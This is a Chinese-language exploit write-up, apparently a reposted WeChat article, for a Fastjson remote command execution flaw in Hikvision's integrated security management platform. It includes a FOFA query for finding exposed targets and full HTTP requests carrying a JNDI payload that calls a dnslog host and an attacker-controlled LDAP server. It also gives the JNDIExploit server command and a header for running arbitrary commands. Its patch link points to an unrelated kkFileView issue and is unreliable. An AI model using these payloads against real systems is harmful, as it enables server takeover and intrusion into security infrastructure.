​海康威视综合安防管理平台存在Fastjson远程命令执行漏洞

admin 2023年6月9日09:05:29​海康威视综合安防管理平台存在Fastjson远程命令执行漏洞已关闭评论343 views字数 2394阅读7分58秒阅读模式

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞

1. 海康威视综合安防管理平台简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。

2.漏洞描述

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,直接获取服务器权限。

3.影响版本

4.fofa 查询语句

app="HIKVISION-综合安防管理平台"

图片

5.漏洞复现

漏洞数据包如下:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

先看看能不能连dnslog服务器,如果dnslog服务器收到请求,则大概率存在命令执行漏洞 

图片

图片

确定dnslog能收到请求之后,使用工具JNDIExploit-1.2-SNAPSHOT.jar 进一步利用。把该工具上传到公网服务器后,执行如下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的公网服务器ip

记得对外开放1389 8080端口哦 

图片

然后就在数据包的头部加上 cmd: whoami  这里whoami也可以改成你想执行的命令

存在注入的地方改成  ldap://这里是的你公网服务器ip地址:1389/Basic/TomcatEcho

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://这里是的你公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

成功执行whoami命令 

图片

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现25 

即可获得该 POC 工具和JNDIExploit-1.2-SNAPSHOT.jar下载地址:

本次的 poc 加入了代理功能,方便各位师傅调试。

图片

7.整改意见

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kekingcn/kkFileView/issues/304

8.往期回顾

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月9日09:05:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​海康威视综合安防管理平台存在Fastjson远程命令执行漏洞https://cn-sec.com/archives/1788384.html